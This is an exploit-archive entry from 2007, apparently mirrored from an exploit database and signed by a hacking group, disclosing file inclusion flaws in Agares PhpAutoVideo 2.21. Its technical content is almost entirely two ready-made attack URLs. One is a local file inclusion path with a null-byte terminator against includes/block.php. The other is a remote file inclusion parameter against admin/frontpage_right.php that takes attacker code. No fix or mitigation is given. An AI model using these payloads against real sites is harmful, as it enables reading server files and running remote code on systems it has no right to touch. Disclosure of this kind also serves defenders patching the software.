[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Agares PhpAutoVideo 2.21 Remote/Local File Inclusion Vulnerabilities
# Published : 2007-12-24
# Author : MhZ91
# Previous Title : SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability
# Next Title : Joomla Component mosDirectory 2.3.2 Remote File Inclusion Vuln
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |_______ _____/ |_ /_ |/ |_
| |/ | | _(__ <_/ ___ __ ______ | __
| | | | |/ ___| | /_____/ | || |
|___|___| /__| /______ /___ >__| |___||__|
/______| / /
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Remote File Inclusion + Local File Inclusion
---------------------------------------------------------------
# Author: MhZ91
# Title: Agares PhpAutoVideo v2.21 - Remote File Inclusion + Local File Inclusion
# Download: http://scriptmafia.org/2007/12/19/agares_phpautovideo_v2.21.html
# Bug: Remote File Inclusion + Local File Inclusion
# Visit: http://www.inj3ct-it.org
---------------------------------------------------------------
Local File Inclusion:
http://[site]/includes/block.php?selected_provider=[LFI]%00
---------------------------------------------------------------
Remote File Inclusion
http://[site]/admin/frontpage_right.php?loadadminpage=[Evil_Code]
---------------------------------------------------------------
# www.Syue.com [2007-12-24]